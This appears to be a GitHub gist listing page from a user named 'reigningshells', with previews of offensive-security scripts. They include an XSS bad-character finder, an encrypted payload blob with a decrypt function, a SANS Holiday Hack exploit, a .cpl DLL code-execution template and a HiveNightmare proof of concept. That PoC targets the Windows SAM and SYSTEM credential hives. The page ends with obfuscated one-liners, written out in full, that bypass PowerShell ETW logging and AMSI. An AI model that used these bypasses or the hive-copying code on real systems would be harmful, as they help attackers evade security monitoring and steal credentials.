reigningshells
reigningshells
/ badchars.py
Created
May 24, 2019 18:45
Simple script to identify an XSS filters "bad characters"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Very simple script to automate the discovery of | |
| bad characters in XSS filters that replace | |
| the entire user input string with an empty string | |
| [CR] = Carriage Return or \r | |
| [LF] = Line Feed or \n |
reigningshells
/ script-encoder.ps1
Last active
January 30, 2020 18:57
Just some script encoding musings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Encode-Script | |
| { | |
| Param( | |
| [Parameter(Position = 0, Mandatory = $True)] | |
| [String] | |
| $Data, | |
| [Parameter(Position = 1, Mandatory = $True)] | |
| [String] | |
| $Key |
reigningshells
/ cryptedkerb.ps1
Created
February 5, 2020 17:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Expand-Script($Key) | |
| { | |
| $script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk |
reigningshells
/ cert-transparency-extractor.py
Last active
July 20, 2020 19:42
Simple script to extract hostnames from cert transparency logs at crt.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import argparse | |
| import requests | |
| from lxml import html | |
| import urllib3 | |
| # Nobody wants to see SSL warnings :-P | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
reigningshells
/ HH2020-tag-generator-pseudo-shell.py
Created
January 23, 2021 15:04
SANS Holiday Hack 2020 Broken Tag Generator Exploit - Solution for Objective 8
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import argparse | |
| import string | |
| import random | |
| import requests | |
| import urllib3 | |
| import base64 | |
| import readline |
reigningshells
/ Cplapplet.cpp
Created
March 7, 2021 03:36
DllMain template to execute code in a .cpl file which is just a renamed DLL that exports a function CplApplet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| extern "C" __declspec(dllexport) LONG CplApplet() | |
| { | |
| MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0); | |
| return 1; | |
| } |
reigningshells
/ DllExportLister.cs
Created
September 5, 2021 02:55
Simple C# program to list exports of 32 and 64 bit DLLs - output mirrored from dumpbin /exports
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| namespace DLLExportLister | |
| { | |
| class Program | |
| { | |
| // Can't use sizeof for IMAGE_SECTION_HEADER because of unmanaged type | |
| public const int SizeOfImageSectionHeader = 40; |
reigningshells
/ Invoke-HiveNightmare.ps1
Last active
February 7, 2024 20:47
Super simple PowerShell PoC for HiveNightmare / SeriousSam that copies SAM and SYSTEM hive shadow copies to C:\Users\Public\Documents
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-HiveNightmare | |
| { | |
| if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access | where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "*Read*")}).Count -gt 0) | |
| { | |
| Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam" | |
| } | |
| else | |
| { | |
| Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies" | |
| } |
reigningshells
/ powershell-bypasses.ps1
Last active
March 16, 2024 09:06
Random PowerShell Bypasses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logging bypass: | |
| (({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
| # AMSI Bypass (old, burned) | |
| sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
| # New AMSI bypass obfuscation: |